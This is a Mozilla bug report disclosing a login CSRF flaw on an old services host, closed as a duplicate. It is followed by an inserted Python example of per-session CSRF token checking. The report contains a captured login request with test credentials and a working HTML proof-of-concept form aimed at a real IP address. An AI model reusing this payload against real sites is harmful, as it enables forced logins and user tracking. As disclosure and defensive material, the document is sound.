Closed
Bug 1116791
Opened 9 years ago
Closed 9 years ago
CSRF vulnerability in accounts.services.mozilla.com
Categories
(mozilla.org Graveyard :: Server Operations, task)
Tracking
(Not tracked)
RESOLVED
DUPLICATE
of bug 772818
People
(Reporter: lalithr95, Unassigned)
Details
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
Build ID: 20140410211200

Steps to reproduce:

CSRF vulnerability in mozilla
URL : https://63.245.217.128/

The Login request does not have valid protection against CSRF attacks. Here is the request:

POST / HTTP/1.1
Host: 63.245.217.128
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://63.245.217.128/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

username=abhijeth0423%40gmail.com&password=testadmin

CSRF POC :

<html>
<body>
<form action="https://63.245.217.128/" method="POST">
<input type="hidden" name="username" value="abhijeth0423@gmail.com" />
<input type="hidden" name="password" value="testadmin" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Actual results:

Using the above vulnerability an attacker can make the victim log in to some test account and then observe the changes or actions made by the victim. This is prevented by using either an authenticated token or CSRF token.

Expected results:

The Login form needs to be protected with an authentication token as one of the parameters in the Login form. This will prevent the CSRF vulnerability.
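The mitigation the reporter asks for, a per-session token carried as a form parameter and checked on the server before the credentials are looked at, as an added Python example. This is illustrative code written for this page, not the Mozilla service's code and not anything attached to the bug. It assumes a constructed in-memory session store, a stub credential check against a constructed test user, and a plain (status, body) return in place of a real HTTP framework; the names SESSIONS, TEST_USERS, new_pre_login_session, render_login_form and handle_login are all hypothetical.

```python
import hmac
import re
import secrets
from typing import Dict, Optional, Tuple

# Constructed in-memory session store: session id -> session state.
# A real deployment keeps this server-side in a store shared by all workers.
SESSIONS: Dict[str, dict] = {}

# Constructed stand-in for the account database (stub credential check).
TEST_USERS = {"user@example.invalid": "correct horse battery staple"}


def new_pre_login_session() -> str:
    """Create an anonymous session before login and give it its own CSRF token.

    The token exists before authentication so the login form itself is
    protected; that is what blocks the "log the victim into an attacker-chosen
    account" variant described in the report.
    """
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32), "user": None}
    return sid


def render_login_form(sid: str) -> str:
    """Embed the session's token as a hidden field in the login form."""
    token = SESSIONS[sid]["csrf_token"]
    return (
        '<form action="/" method="POST">'
        f'<input type="hidden" name="csrf_token" value="{token}" />'
        '<input name="username" /><input name="password" type="password" />'
        '<input type="submit" value="Log in" /></form>'
    )


def handle_login(cookie_sid: Optional[str], form: Dict[str, str]) -> Tuple[int, str]:
    """Validate the synchronizer token, then the credentials.

    Returns an (HTTP status, message) pair. A cross-site POST carries the
    victim's session cookie but cannot read the token out of the page, so it
    fails the comparison below before any credential is examined.
    """
    sid = cookie_sid or ""
    session = SESSIONS.get(sid)
    if session is None:
        return 403, "no pre-login session"
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(session["csrf_token"], submitted):
        return 403, "CSRF token missing or invalid"

    username = form.get("username", "")
    password = form.get("password", "")
    expected = TEST_USERS.get(username)
    if expected is None or not hmac.compare_digest(expected, password):
        return 401, "bad credentials"

    # On success, rotate the session id (prevents session fixation) and issue a
    # fresh token so the pre-login token cannot be replayed later.
    del SESSIONS[sid]
    new_sid = secrets.token_urlsafe(32)
    SESSIONS[new_sid] = {"csrf_token": secrets.token_urlsafe(32), "user": username}
    return 200, new_sid


def forged_request(victim_sid: str) -> Tuple[int, str]:
    """Model the report's PoC: hidden username/password fields and no token.

    The browser attaches the victim's cookie automatically, so the token check
    is the only thing standing between the forged form and a login.
    """
    return handle_login(
        victim_sid,
        {"username": "user@example.invalid", "password": "correct horse battery staple"},
    )


def legitimate_request(sid: str) -> Tuple[int, str]:
    """A first-party submission that includes the token from the rendered form."""
    html = render_login_form(sid)
    token = re.search(r'name="csrf_token" value="([^"]+)"', html).group(1)
    return handle_login(
        sid,
        {
            "csrf_token": token,
            "username": "user@example.invalid",
            "password": "correct horse battery staple",
        },
    )


if __name__ == "__main__":
    victim = new_pre_login_session()
    print("forged POST without token:", forged_request(victim))
    print("first-party POST with token:", legitimate_request(victim)[0])
```

The forged submission is rejected with 403 even though the credentials in it are valid, which is the property the reporter describes as missing; the first-party submission succeeds and is moved to a new session id. Note that the token must be tied to the specific session (not a fixed site-wide value), and that the comparison uses hmac.compare_digest so that token checking does not leak timing information.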
Updated•9 years ago
Assignee: nobody → server-ops
Component: General → Server Operations
Product: Core → mozilla.org
QA Contact: shyam
Version: 28 Branch → other
Comment 1•9 years ago (Reporter)
Please add sec-bounty flag! Regards
Comment 2•9 years ago
As best I can tell this is the old sync service, and signing in with a test account on the web won't do anything in terms of actually syncing anything behaviour-wise. I also see an SSL cert warning if I use the instructions as written, because the IP address doesn't match the cert. Going to https://services.mozilla.com/ doesn't show the same page as ignoring the cert warning. In other words, I'm not sure there's anything to be worried about here. Richard, can you clarify some more?
Flags: needinfo?(rnewman)
Comment 3•9 years ago
Yeah, that machine is account01.phx.services.mozilla.com, which will be decommissioned soon. And this is a dupe.
Status: UNCONFIRMED → RESOLVED
Closed: 9 years ago
Flags: needinfo?(rnewman)
Resolution: --- → DUPLICATE
Summary: CSRF vulnerability in mozilla subd-domain → CSRF vulnerability in accounts.services.mozilla.com
Updated•9 years ago
Product: mozilla.org → mozilla.org Graveyard
Updated•9 years ago
Group: core-security